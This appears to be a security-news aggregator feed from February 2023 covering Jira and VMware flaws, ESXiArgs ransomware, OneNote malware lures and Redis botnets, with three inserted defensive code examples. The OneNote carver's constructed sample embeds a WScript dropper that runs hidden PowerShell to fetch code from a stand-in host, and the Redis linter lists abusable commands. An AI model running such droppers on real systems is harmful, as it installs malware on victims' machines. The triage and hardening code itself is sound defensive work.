                2023-02-03 https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-bug-giving-access-to-jira-service-management/
                A critical vulnerability in Atlassian's Jira Service Management Server and Data Center could allow an unauthenticated attacker to impersonate other users and gain remote access to the systems. [...]


                VMware Workstation update fixes an arbitrary file deletion bug

                exploits
                2023-02-03 https://securityaffairs.com/141773/security/vmware-workstation-arbitrary-file-deletion.html

                VMware addressed a high-severity privilege escalation vulnerability, tracked as CVE-2023-20854, in VMware Workstation. An attacker can exploit the flaw to delete arbitrary files on Workstation 17.x for Windows. "An arbitrary file deletion vulnerability in VMware Workstation was privately reported to VMware. Updates are […]


                Atlassian fixed critical authentication vulnerability in Jira Software

                exploits
                2023-02-03 https://securityaffairs.com/141766/security/atlassian-critical-vulnerability-jira-software.html

                Atlassian fixed a critical flaw in Jira Service Management Server and Data Center that can allow an attacker to impersonate another user and gain access to a Jira Service Management instance. Atlassian has released security updates to address the vulnerability, tracked as CVE-2023-22501 (CVSS score: 9.4), […]


                Florida hospital takes IT systems offline after cyberattack

                ciber
                2023-02-03 https://www.bleepingcomputer.com/news/security/florida-hospital-takes-it-systems-offline-after-cyberattack/
                Tallahassee Memorial HealthCare (TMH) has taken its IT systems offline and suspended non-emergency procedures following a late Thursday cyberattack. [...]

                Autosummary: Throughout last year, the federal government has warned about ransomware operations known for actively targeting healthcare organizations across the U.S. For instance, the U.S. Department of Health and Human Services (HHS) warned of the Royal


                GoAnywhere MFT zero-day vulnerability lets hackers breach servers

                exploits
                2023-02-03 https://www.bleepingcomputer.com/news/security/goanywhere-mft-zero-day-vulnerability-lets-hackers-breach-servers/
                The developers of the GoAnywhere MFT file transfer solution are warning customers of a zero-day remote code execution vulnerability affecting exposed administrator consoles. [...]

                Autosummary: BleepingComputer has identified local governments, healthcare companies, banks, energy firms, financial services companies, museums, and computer part manufacturers utilizing the GoAnywhere file transfer solution.


                Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware

                exploits
                2023-02-03 https://thehackernews.com/2023/02/post-macro-world-sees-rise-in-microsoft.html
                In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise. Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.
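The OneNote lures described above work because a .one section file can carry arbitrary attachments, and the phishing documents hide a script or executable behind a fake "click to view" button. The added example below is not from the article or from any of the tools it mentions; it carves those attachments straight out of a .one file by scanning for the FileDataStoreObject structure that OneNote uses to store embedded files (header GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, 8-byte length, 12 reserved bytes, the file bytes, then a footer GUID). The sample file is constructed inline, and the payload classification heuristics at the end are illustrative choices of mine, not a signature set.

```python
"""Added example: carve embedded files out of a OneNote .one section file.

On-disk layout of a FileDataStoreObject (MS-ONESTORE):
  guidHeader  16 bytes  {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
  cbLength     8 bytes  little-endian length of FileData
  unused       4 bytes
  reserved     8 bytes
  FileData     cbLength bytes
  guidFooter  16 bytes  {71FBA722-0F79-4A0B-BB13-899256426B24}
Scanning for the header GUID pulls out every attachment without parsing the
whole object tree, which is enough for triage of a suspicious lure.
"""
import struct
import uuid

# GUIDs are written to disk in the mixed-endian layout that uuid.bytes_le gives.
FILE_DATA_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FILE_DATA_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
HEADER_SIZE = 16 + 8 + 4 + 8  # guid + cbLength + unused + reserved


def carve_embedded_files(blob: bytes) -> list[bytes]:
    """Return the FileData payload of every FileDataStoreObject in blob."""
    payloads = []
    pos = blob.find(FILE_DATA_HEADER)
    while pos != -1:
        if pos + HEADER_SIZE > len(blob):
            break
        (cb_length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + HEADER_SIZE
        end = start + cb_length
        if end > len(blob):  # truncated or corrupted object: stop, do not over-read
            break
        payloads.append(blob[start:end])
        pos = blob.find(FILE_DATA_HEADER, end)
    return payloads


def classify_payload(data: bytes) -> str:
    """Rough triage of one attachment. Heuristics are illustrative only; real
    triage hands the bytes to a sandbox or AV engine."""
    head = data[:4096].lower()
    if data[:2] == b"MZ":
        return "pe-executable"
    if data[:4] == b"%PDF":
        return "pdf"
    script_markers = (b"<script", b"wscript", b"cscript", b"powershell",
                      b"createobject(", b"cmd.exe", b"@echo off")
    if any(m in head for m in script_markers):
        return "script"
    return "other"


def risky_attachments(blob: bytes) -> list[str]:
    """Kinds of attachment in a .one file that warrant a closer look."""
    kinds = (classify_payload(p) for p in carve_embedded_files(blob))
    return [k for k in kinds if k in ("pe-executable", "script")]


def build_file_data_store_object(payload: bytes) -> bytes:
    """Wrap payload in one FileDataStoreObject (used to build the sample)."""
    return (FILE_DATA_HEADER + struct.pack("<Q", len(payload)) + b"\0" * 12
            + payload + FILE_DATA_FOOTER)


# Constructed sample: leading filler bytes (not a real OneNote file header), a
# benign PNG-looking attachment, then a WSH dropper of the kind the lures embed.
SAMPLE_ONE = (
    b"CONSTRUCTED-ONE-FILE-PREFIX" + b"\0" * 16
    + build_file_data_store_object(b"\x89PNG\r\n\x1a\n" + b"\0" * 32)
    + b"\0" * 16
    + build_file_data_store_object(
        b'Set o = CreateObject("WScript.Shell")\r\n'
        b'o.Run "powershell -nop -w hidden -c iwr http://example.invalid/x"\r\n')
)

if __name__ == "__main__":
    for i, p in enumerate(carve_embedded_files(SAMPLE_ONE)):
        print(i, len(p), classify_payload(p))
    print(risky_attachments(SAMPLE_ONE))
```

Because the scan keys on the header GUID rather than on the document's object tree, it also finds attachments that a viewer would not render, which is exactly where a lure's dropper tends to sit. A length that runs past the end of the file is treated as corruption and stops the scan instead of being trusted.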


                Massive ESXiArgs ransomware attack targets VMware ESXi servers worldwide

                exploits ransomware
                2023-02-03 https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/
                Admins, hosting providers, and the French Computer Emergency Response Team (CERT-FR) warn that attackers actively target VMware ESXi servers unpatched against a two-year-old remote code execution vulnerability to deploy ransomware. [...]

                Autosummary: Compromised ESXi servers worldwide (Shodan). New ESXiArgs ransomware: from the ransom notes seen in this attack, the operators do not appear to be related to the Nevada Ransomware, and appear to be from a new ransomware family.
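The ESXiArgs and CERT-FR entries above say the same thing: the hosts being hit are ESXi 6.5, 6.7 and 7.0 builds that never received the February 2021 fix for CVE-2021-21974, with the OpenSLP service (slpd, 427/tcp and udp, firewall ruleset CIMSLP) reachable from outside. The added example below is not code from BleepingComputer, CERT-FR or VMware; it ranks an ESXi inventory by that exposure. The inventory records are constructed, and the first-fixed build numbers are as I recall them from VMSA-2021-0002 and must be confirmed against that advisory before anyone bases a patch decision on them.

```python
"""Added example: triage an ESXi inventory for CVE-2021-21974 exposure.

A host is at risk when its build predates the VMSA-2021-0002 fix for its
branch AND slpd is running AND 427/tcp is reachable from untrusted networks.
"""
from dataclasses import dataclass

# First fixed build per branch. ASSUMPTION: from memory of VMSA-2021-0002;
# verify against the advisory before relying on these numbers.
FIRST_FIXED_BUILD = {"6.5": 17477841, "6.7": 17499825, "7.0": 17325551}
SLP_PORT = 427


@dataclass
class EsxiHost:
    name: str
    version: str               # "6.5", "6.7", "7.0", "8.0", ...
    build: int                 # from `vmware -vl` / vCenter
    slpd_running: bool         # from `chkconfig --list` or `/etc/init.d/slpd status`
    slp_port_reachable: bool   # 427/tcp answers from an untrusted network


def unpatched(host: EsxiHost) -> bool:
    """True if the branch was affected and the build predates the fix."""
    fixed = FIRST_FIXED_BUILD.get(host.version)
    if fixed is None:      # branch not in the affected set (e.g. 8.0)
        return False
    return host.build < fixed


def triage(host: EsxiHost) -> str:
    """Rank a host for follow-up.
    critical: vulnerable build, slpd running and 427/tcp reachable
    high:     vulnerable build, slpd running, port not reachable from outside
    medium:   patched (or slpd reported stopped) but 427/tcp still reachable
    ok:       nothing to do for this CVE
    """
    vuln = unpatched(host)
    if vuln and host.slpd_running and host.slp_port_reachable:
        return "critical"
    if vuln and host.slpd_running:
        return "high"
    if host.slp_port_reachable:
        return "medium"
    return "ok"


def triage_inventory(hosts: list[EsxiHost]) -> dict[str, str]:
    """Name -> triage level for every host in the inventory."""
    return {h.name: triage(h) for h in hosts}


# Constructed inventory (hostnames and states invented for the example).
INVENTORY = [
    EsxiHost("esx-dmz-01", "6.7", 17167734, True, True),     # pre-fix 6.7, SLP exposed
    EsxiHost("esx-lab-02", "7.0", 16850804, True, False),    # pre-fix 7.0, internal only
    EsxiHost("esx-prod-03", "7.0", 17325551, True, True),    # patched, SLP still exposed
    EsxiHost("esx-prod-04", "8.0", 20513097, False, False),  # branch not affected
]

if __name__ == "__main__":
    for name, level in triage_inventory(INVENTORY).items():
        print(f"{name:12s} {level}")
```

The "medium" bucket exists on purpose: SLP has no business being reachable from the internet on a hypervisor whether or not the build is patched, and VMware's own workaround for this bug was to stop and disable the service and close its firewall ruleset (`/etc/init.d/slpd stop`, `esxcli network firewall ruleset set -r CIMSLP -e 0`, `chkconfig slpd off`).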


                Exploitation attempts for Oracle E-Business Suite flaw observed after PoC release

                exploits
                2023-02-03 https://securityaffairs.com/141782/hacking/oracle-e-business-suite-flaw-poc.html

                Shadowserver researchers warn that threat actors started attempting to exploit a critical Oracle E-Business Suite flaw, tracked as CVE-2022-21587, shortly after a PoC was published. The E-Business Suite is a set of enterprise applications that allows organizations to automate […]


                TruthFinder, Instant Checkmate confirm data breach affecting 20M customers

                financial
                2023-02-03 https://www.bleepingcomputer.com/news/security/truthfinder-instant-checkmate-confirm-data-breach-affecting-20m-customers/
                PeopleConnect, the owners of the TruthFinder and Instant Checkmate background check services, confirmed they suffered a data breach after hackers leaked a 2019 backup database containing the info of millions of customers. [...]

                Autosummary: "We learned recently that a list, including name, email, telephone number in some instances, as well as securely encrypted passwords and expired and inactive password reset tokens, of TruthFinder subscribers was being discussed and made available in an online forum," reads the data security incident notices.


                Cyberthreats facing UK finance sector "a national security threat"

                financial
                2023-02-03 https://www.malwarebytes.com/blog/news/2023/02/financials-are-facing-an-unprecedented-number-of-cybersecurity-threats

                Reports published about the UK financial industry show a growing number of cyberthreats and enormous losses to fraud.

                Autosummary: Stuart Skinner, head of fraud protection at NatWest, said: We are committed to helping our customers stay safe and secure and are continuously investing in new fraud prevention tools and the latest security technology. Consumers: the main types of fraud targeting consumers were authorized push payment (APP) scams, which use social engineering that tricks victims into authorizing payments to accounts belonging to the scammer, and card fraud covering remote card purchases, lost and stolen cards, cards that aren't received, counterfeit cards, and card ID theft.


                The rise of multi-threat ransomware

                exploits ransomware
                2023-02-03 https://www.malwarebytes.com/blog/news/2023/02/the-rise-of-multi-threat-ransomware

                Take a look at our ten minute video walkthrough of ransomware issues and concerns.


                Hornetsecurity unveils two tools to counter rise in phishing attacks and malicious links

                financial
                2023-02-02 https://www.helpnetsecurity.com/2023/02/02/hornetsecurity-qr-code-analyzer/

                Hornetsecurity launched two new tools – the QR Code Analyzer and Secure Links – to combat growing cyber threats. These launches come in response to a rise in fake QR codes and the ongoing threat of phishing, which represents 40% of all cyber threats. Hornetsecurity has also released a new automated mailbox migration solution, which helps partners efficiently and securely deploy and operate Microsoft 365 in the cloud for their customers – and remain safe … More

                Autosummary: Hornetsecurity COO Daniel Blank added: "Hornetsecurity has listened to our partners' needs, which has led to the launch of our efficient and safe Mailbox Migration Tool, at the same time as our new partner program is rolled out."


                New Threat: Stealthy HeadCrab Malware Compromised Over 1,200 Redis Servers

                exploits
                2023-02-02 https://thehackernews.com/2023/02/new-threat-stealthy-headcrab-malware.html
                At least 1,200 Redis database servers worldwide have been corralled into a botnet using an "elusive and severe threat" dubbed HeadCrab since early September 2021. "This advanced threat actor utilizes a state-of-the-art, custom-made malware that is undetectable by agentless and traditional anti-virus solutions to compromise a large number of Redis servers," Aqua security researcher Asaf Eitani
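The HeadCrab item says only that exposed Redis servers were enrolled into a botnet; what makes a Redis server enrollable is reachable on every interface, no authentication, and the commands that let a remote client pull code or files onto the box left enabled. The added example below is written for this page and is not code from Aqua's report or the article. It lints a redis.conf for those settings using standard directive names (`bind`, `protected-mode`, `requirepass`, `rename-command`); which commands count as dangerous (replication, module loading, CONFIG, DEBUG) is my own choice, and the weak and hardened configs are constructed.

```python
"""Added example: lint a redis.conf for the settings that leave the server
open to any client that can reach it, and show the corrected settings."""

# Commands a remote client can use to pull code/files onto the server:
# SLAVEOF/REPLICAOF make the instance sync from an attacker-controlled master,
# MODULE loads a shared object, CONFIG rewrites dir/dbfilename, DEBUG crashes it.
DANGEROUS_COMMANDS = {"SLAVEOF", "REPLICAOF", "MODULE", "CONFIG", "DEBUG"}


def parse_redis_conf(text: str) -> dict[str, list[list[str]]]:
    """Map directive -> list of argument lists (directives may repeat)."""
    conf: dict[str, list[list[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def lint_redis_conf(text: str) -> list[str]:
    """Return human-readable findings; an empty list means all checks passed."""
    conf = parse_redis_conf(text)
    findings = []

    # Listening on every interface is the first ingredient of an exposed server.
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listening on all interfaces")

    # protected-mode refuses remote clients when no password/bind is set.
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote access allowed")

    password = conf.get("requirepass", [[]])[-1]
    if not password or not password[0].strip('"'):
        findings.append("requirepass: no password set")

    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    missing = sorted(DANGEROUS_COMMANDS - renamed)
    if missing:
        findings.append("rename-command: still exposed: " + ", ".join(missing))
    return findings


# Constructed: the settings many exposed servers still run.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed: the same server hardened. The password is a placeholder.
HARDENED_CONF = """
bind 127.0.0.1 10.0.0.5
protected-mode yes
port 6379
requirepass "replace-with-a-long-random-secret"
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG "cfg-7f3a9c"
rename-command DEBUG ""
"""

if __name__ == "__main__":
    print("weak:    ", lint_redis_conf(WEAK_CONF))
    print("hardened:", lint_redis_conf(HARDENED_CONF))
```

On Redis 6 and later, ACL users (`user ... -@dangerous`) are the cleaner way to take these commands away from application credentials; `rename-command` is shown because it is what older deployments, which are the ones still exposed, can actually apply. Either way, a Redis instance that needs to be reachable across a network should be behind TLS or a private network, not bound to 0.0.0.0.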


                Cybersecurity budgets are going up. So why aren't breaches going down?

                ciber
                2023-02-02 https://thehackernews.com/2023/02/cybersecurity-budgets-are-going-up-so.html
                Over the past few years, cybersecurity has become a major concern for businesses around the globe. With the total cost of cybercrime in 2023 forecasted to reach $8 Trillion – with a T, not a B – it’s no wonder that cybersecurity is top of mind for leaders across all industries and regions. However, despite growing attention and budgets for cybersecurity in recent years, attacks have only become

                Autosummary: Impactful threat intelligence must have four properties: Accurate (the intelligence must be true and accurate); Relevant (the intelligence must be relevant to the organization); Actionable (there must be actions the organization can take to defeat the threat); Cost Effective (the cost of the threat must be greater than the cost of remediation). This new framework brings a much-needed shift from looking at cybersecurity as strictly a technical problem to a mindset where cybersecurity is viewed as a business challenge that must be addressed in an efficient and cost-effective manner.


                North Korean Hackers Exploit Unpatched Zimbra Devices in "No Pineapple" Campaign

                exploits
                2023-02-02 https://thehackernews.com/2023/02/north-korean-hackers-exploit-unpatched.html
                A new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems. That's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident No Pineapple. Targets of the malicious operation included a healthcare research organization


                Peru Congress rejects early election despite protests

                latam
                2023-02-02 https://www.bbc.co.uk/news/world-latin-america-64496596?at_medium=RSS&at_campaign=KARANGA
                President Dina Boluarte wants elections this year to quell deadly protests which have rocked the country.


                Ransomware attack on ION Group impacts derivatives trading market

                exploits
                2023-02-02 https://www.bleepingcomputer.com/news/security/ransomware-attack-on-ion-group-impacts-derivatives-trading-market/
                The LockBit ransomware gang has claimed responsibility for the cyberattack on ION Group, a UK-based software company whose products are used by financial institutions, banks, and corporations for trading, investment management, and market analytics. [...]


                New Russian-Backed Gamaredon"s Spyware Variants Targeting Ukrainian Authorities

                rusia-ucrania
                2023-02-02 https://thehackernews.com/2023/02/new-russian-backed-gamaredons-spyware.html
                The State Cyber Protection Centre (SCPC) of Ukraine has called out the Russian state-sponsored threat actor known as Gamaredon for its targeted cyber attacks on public authorities and critical information infrastructure in the country. The advanced persistent threat, also known as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and UAC-0010, has a track record of striking Ukrainian entities dating as far back as 2013.


                Cisco fixes bug allowing backdoor persistence between reboots

                exploits
                2023-02-02 https://www.bleepingcomputer.com/news/security/cisco-fixes-bug-allowing-backdoor-persistence-between-reboots/
                Cisco has released security updates this week to address a high-severity vulnerability in the Cisco IOx application hosting environment that can be exploited in command injection attacks. [...]

                Autosummary: Social engineering: attackers also find success exploiting human weakness by social engineering someone to hand over credentials. Once this requirement is fulfilled, attackers can exploit CVE-2023-20076 for "unrestricted access, allowing malicious code to lurk in the system and persist across reboots and firmware upgrades," as the researchers explained.


                Romance fraud losses rose 91% during the pandemic, claims UK’s TSB bank

                financial
                2023-02-02 https://www.tripwire.com/state-of-security/romance-fraud-losses-rose-91-during-pandemic-claims-uks-tsb-bank
                UK banking group TSB is calling on social networks and dating apps to better protect their users from fake profiles, following an alarming spike in romance fraud. Read more in my article on the Tripwire State of Security blog.

                Autosummary: In those cases where the origin of the romance fraud was recorded, the initial approach by the scammer was made via social networks and dating apps, with Facebook accounting for over a third of all fraud cases: Facebook 35%, Tinder 24%, Plenty of Fish 21%, Match.com 9%, Olderdating.com 3%, Bumble 3%, Instagram 3%. According to the research, all age groups are vulnerable to falling for a romance scam, with TSB saying it has refunded victims aged between 18 and 77.


                A High-severity bug in F5 BIG-IP can lead to code execution and DoS

                exploits
                2023-02-02 https://securityaffairs.com/141728/security/f5-big-ip-bug.html

                A high-severity vulnerability in F5 BIG-IP, tracked as CVE-2023-22374, can be exploited to cause a DoS condition and potentially lead to arbitrary code execution. "A format string vulnerability exists in iControl SOAP that allows an […]

                Autosummary: The flaw affects the following versions of BIG-IP: 17.0.0; 16.1.2.2 – 16.1.3; 15.1.5.1 – 15.1.8; 14.1.4.6 – 14.1.5; 13.1.5. "The most likely impact of a successful attack is to crash the server process."


                Hackers weaponize Microsoft Visual Studio add-ins to push malware

                exploits
                2023-02-02 https://www.bleepingcomputer.com/news/security/hackers-weaponize-microsoft-visual-studio-add-ins-to-push-malware/
                Security researchers warn that hackers may start using Microsoft Visual Studio Tools for Office (VSTO) more often as a method to achieve persistence and execute code on a target machine via malicious Office add-ins. [...]

                Autosummary: PowerShell script hiding inside the malicious add-in (Deep Instinct). In another example that involved a remote VSTO-based add-in, the threat actors set the .DLL payload to download a password-protected ZIP archive and drop it into the "%\AppData\Local\ folder."


                Argentina unveils new 2,000-peso banknote as inflation bites

                financial latam
                2023-02-02 https://www.bbc.co.uk/news/world-latin-america-64507085?at_medium=RSS&at_campaign=KARANGA
                The new 2,000-peso note comes after the country's annual inflation rate soared to 95% last year.


                Cybersecurity and privacy tips you can teach your 5+-year-old

                ciber
                2023-02-02 https://www.malwarebytes.com/blog/news/2023/02/cybersecurity-and-privacy-tips-you-can-teach-your-5-year-old

                Categories: Personal

                Tags: cybersecurity 101

                Tags: online privacy 101

                Are you smarter than a five-year-old? When it comes to online security and privacy, you should be.

                (Read more...)

                The post Cybersecurity and privacy tips you can teach your 5+-year-old appeared first on Malwarebytes Labs.

                "

                Autosummary: This gives you, the parent or guardian, the opportunity to review the app to see if it's any good for them (remember, dubious apps can still end up in these stores). Though it's hardly news that more and more children are being introduced to mobile computing devices like tablets, smartphones, and laptops at an early age, you may be surprised at what that age is. Kiddo doesn't have a single social media account, but we're already instilling in her the value of information related to her and, consequently, us. "


                Is that survey real or fake? How to spot a survey scam

                financial
                2023-02-02 https://www.welivesecurity.com/2023/02/02/real-fake-spot-survey-scam/

                “Can I tell a legitimate survey apart from a fake one?” is the single most important question you need to answer for yourself before taking any surveys online

                The post Is that survey real or fake? How to spot a survey scam appeared first on WeLiveSecurity

                "

                Autosummary: Recipients are offered money, a gift card, a gadget (e.g., iPad/iPhone), entry to a sweepstake, money off their next purchase, or any number of non-existent prizes if they participate in the survey. Whether the scammers are looking to steal your passwords, credit card details or other information, install malware on your PC or another device, or add you to more spam mailing lists, it makes sense to understand what the risks are, and how to “separate the wheat from the chaff”. How to protect yourself: With the above in mind, it makes sense to understand the tell-tale signs of a survey scam, what to do in order to stay safe and what should happen if you fall victim. Also, take the following steps to stay safe and secure: Don’t blindly trust survey offers, even if sent from a friend or family member. "


                New Sh1mmer ChromeBook exploit unenrolls managed devices

                exploits
                2023-02-01 https://www.bleepingcomputer.com/news/security/new-sh1mmer-chromebook-exploit-unenrolls-managed-devices/
                A new exploit called "Sh1mmer" allows users to unenroll an enterprise-managed Chromebook, enabling them to install any apps they wish and bypass device restrictions. [...] "

                Autosummary: brask, brya, clapper, coral, dedede, enguarde, glimmer, grunt, hana, hatch, jacuzzi, kukui, nami, octopus, orco, pyro, reks, sentry, stout, strongbad, tidus, ultima, volteer, zork For those unfamiliar with RMA shims, they are disk images stored on USB devices that contain a combination of the ChromOS factory bundle components used to reinstall the operating system and manufacturer tools used to perform repair and diagnostics. "


                As the anti-money laundering perimeter expands, who needs to be compliant, and how?

                financial
                2023-02-01 https://www.helpnetsecurity.com/2023/02/01/anti-money-laundering-perimeter/

                Anti-money laundering (AML) policies are getting stronger as countries crack down on any opportunity criminals might have to take advantage of services and resources to further their activity. The US has the Bank Secrecy Act, the Patriot Act, and Anti-Money Laundering Act of 2020, which promote cooperation and the use of sophisticated technology to combat financial crimes and the funding of terrorism. Especially noteworthy is that they’ve widened their nets over recent years so that … More

                The post As the anti-money laundering perimeter expands, who needs to be compliant, and how? appeared first on Help Net Security.

                "

                Autosummary: The Financial Crimes Enforcement Network (FinCEN), the main regulating body in the US, even specifies what an obligated person means, namely: “An individual, a corporation, a partnership, a trust or estate, a joint stock company, an association, a syndicate, joint venture, or other unincorporated organization or group, an Indian Tribe (as that term is defined in the Indian Gaming Regulatory Act), and all entities cognizable as legal personalities.” First, let’s break down the entities this includes (but isn’t limited to): Banks; Mutual funds; Credit card systems operators; Loan or finance companies; Insurance companies; Brokers or dealers in securities; Futures commissions merchants; Introducing brokers to commodities; Money services (e.g., check issuers and cashers, foreign exchange dealers, prepaid access providers, money transmitters, virtual currency and wallet providers). AML regulating bodies want to see that your company has a complex program in place, combining automated and manual processes, that can constantly supervise customers, quickly spot suspicious activity, and report cases without delay. Read up on official requirements in detail, develop a realistic AML program that reflects your business and is easy for your team to maintain, and stay on top of your system’s performance, good or bad, and any regulation updates. But not all businesses are the same in terms of structure, services, and risks, so FinCEN and the Office of Financial Assets Control (OFAC) adapt their regulations for each sector and let companies within them develop their own compliance programs. "


                The future of vulnerability management and patch compliance

                exploits
                2023-02-01 https://www.helpnetsecurity.com/2023/02/01/future-vulnerability-management-patch-compliance-video/

                IT departments continue to face immense pressure to get vulnerability and patch management right as threat actors use new and old methods to exploit network endpoints. But are we ready for what’s next? As vulnerabilities continue to increase, what strategies should security professionals use to gain visibility into these threats, prioritize them, and manage the ongoing risk to endpoints? What will the vulnerability landscape look like in 2023, and what new challenges will security and … More

                The post The future of vulnerability management and patch compliance appeared first on Help Net Security.

                "

                Autosummary: "


                70% of CIOs anticipate their involvement in cybersecurity to increase

                ciber
                2023-02-01 https://www.helpnetsecurity.com/2023/02/01/cio-cybersecurity/

                77% of CIOs say their role has been elevated due to the state of the economy and they expect this visibility within the organization to continue, according to Foundry. “The CIO role is constantly evolving, and economic conditions have put a new level of pressure on these executives,” said Holly McWalter, Marketing & Research Specialist, Foundry. “This year’s research showcases how this pressure trickles down to important decisions regarding priorities and budget, and provides insight … More

                The post 70% of CIOs anticipate their involvement in cybersecurity to increase appeared first on Help Net Security.

                "

                Autosummary: When asked how the state of the economy has impacted the way their organization is prioritizing business initiatives, the following have increased in priority – increasing operational efficiency (58%), increasing cybersecurity protections (58%), transforming existing business processes (54%), improving profitability (54%), and improving the customer experience (49%). "


                ThreatSpike Red makes offensive cybersecurity accessible to more organizations

                ciber
                2023-02-01 https://www.helpnetsecurity.com/2023/02/01/threatspike-red/

                ThreatSpike Red helps organisations of all sizes to close the cybersecurity gap by providing continuous unlimited testing and scanning of applications and websites to identify vulnerabilities. The new managed service is giving customers full visibility over cost, and makes advanced offensive cybersecurity accessible to more organizations large and small. Compared to conventional pentesting conducted once or twice per year, ThreatSpike Red enables customers to undertake continuous cybersecurity evaluation, achieving greater depth through red team exercises … More

                The post ThreatSpike Red makes offensive cybersecurity accessible to more organizations appeared first on Help Net Security.

                "

                Autosummary: Adam Blake, CEO of ThreatSpike, explains, “In today’s challenging digital environment offensive cybersecurity shouldn’t be just a point-in-time activity, but the high cost of traditional pentesting services means most organisations can only afford to test infrequently, if at all. "


                Prilex PoS Malware Evolves to Block Contactless Payments to Steal from NFC Cards

                exploits
                2023-02-01 https://thehackernews.com/2023/02/prilex-pos-malware-evolves-to-block.html
                The Brazilian threat actors behind an advanced and modular point-of-sale (PoS) malware known as Prilex have reared their head once again with new updates that allow it to block contactless payment transactions. Russian cybersecurity firm Kaspersky said it detected three versions of Prilex (06.03.8080, 06.03.8072, and 06.03.8070) that are capable of targeting NFC-enabled credit cards, taking its "

                Autosummary: "


                Nevada Ransomware Has Released Upgraded Locker

                exploits ransomware
                2023-02-01 https://securityaffairs.com/141668/cyber-crime/nevada-ransomware-upgraded-locker.html

                Researchers from Resecurity have identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. Resecurity, California-based cybersecurity company protecting Fortune 500 globally, has identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors […]

                The post Nevada Ransomware Has Released Upgraded Locker appeared first on Security Affairs.

                "

                Autosummary: "


                TrickGate, a packer used by malware to evade detection since 2016

                exploits
                2023-02-01 https://securityaffairs.com/141650/malware/trickgate-packer.html

                TrickGate is a shellcode-based packer offered as a service to malware authors to avoid detection, CheckPoint researchers reported. TrickGate is a shellcode-based packer offered as a service, in use since at least July 2016, to hide malware from defense programs. A packer (aka “Crypter” and “FUD”) implements a series of functionalities to make it harder for […]

                The post TrickGate, a packer used by malware to evade detection since 2016 appeared first on Security Affairs.

                "

                Autosummary: The Check Point Research team reported that over the last 6 years, TrickGate was used to drop some of the most popular malware families, including Cerber, Trickbot, Maze, Emotet, REvil, Cobalt Strike, AZORult, Formbook, and AgentTesla. "


                Hackers use new IceBreaker malware to breach gaming companies

                exploits
                2023-02-01 https://www.bleepingcomputer.com/news/security/hackers-use-new-icebreaker-malware-to-breach-gaming-companies/
                A previously unknown threat group has been targeting the customer service platforms of online gaming and gambling companies using social engineering to drop its custom implant. [...] "

                Autosummary: LNK file (Screenshot.jpg) properties (Security Joes) Security Joes researchers say that the downloaded malware is "a highly complex compiled JavaScript file" that can discover running processes, steal passwords, cookies, and files, open a proxy tunnel for the attacker, as well as run scripts retrieved from the attackers' server. Port.exe file properties (Security Joes) Upon further analysis, Security Joes figured that the sample is a previously unseen module backdoor written in Node.js, providing threat actors with the following capabilities: Customization via plugins that extend the malware's built-in features. "


                Crypto scam apps infiltrate Apple App Store and Google Play

                financial
                2023-02-01 https://www.bleepingcomputer.com/news/security/crypto-scam-apps-infiltrate-apple-app-store-and-google-play/
                Operators of high-yielding investment scams known as "pig butchering" have found a way to bypass the defenses in Google Play and Apple's App Store, the official repositories for Android and iOS apps. [...] "

                Autosummary: Sophos observed such a campaign from a China-based threat group named "ShaZhuPan," which shows high organizational levels with distinct teams doing victim interaction, finance, franchise, and money laundering. "


                Tech Nation to close as UK government pulls key funding

                government
                2023-02-01 https://www.csoonline.com/article/3686537/tech-nation-to-close-as-uk-government-pulls-key-funding.html#tk.rss_security
                Tech Nation will cease operations after a decade of supporting and transforming the UK’s scaleup tech ecosystem through programmes including Tech Nation Cyber. "

                Autosummary: The closure pulls many resources, such as workshops, events, mentorship opportunities, and access to a community of like-minded individuals, along with weakening UK growth for cybersecurity startups and incubated entities, Cunningham adds. Tech Nation “not viable” without vital government funding In a post on its website, Tech Nation stated that it has exhaustively explored whether it could continue without core government grant funding, but has concluded, after extensive consultation, that this is not an option. Whilst there is no doubt Tech Nation has made a positive impact over the last decade, the majority of similar, government-funded projects are expected to be self-funding over time, says Brian Higgins, security specialist at Comparitech. "


                Experts Warn of "Ice Breaker" Cyberattacks Targeting Gaming and Gambling Industry

                industry ciber
                2023-02-01 https://thehackernews.com/2023/02/experts-warn-of-ice-breaker.html
                A new attack campaign has targeted the gaming and gambling sectors since at least September 2022, just months prior to the ICE London 2023 gaming industry trade fair event that's scheduled next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker, stating the intrusions employ clever social engineering tactics to deploy a JavaScript "

                Autosummary: "


                New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices

                exploits
                2023-02-01 https://thehackernews.com/2023/02/new-sh1mmer-exploit-for-chromebook.html
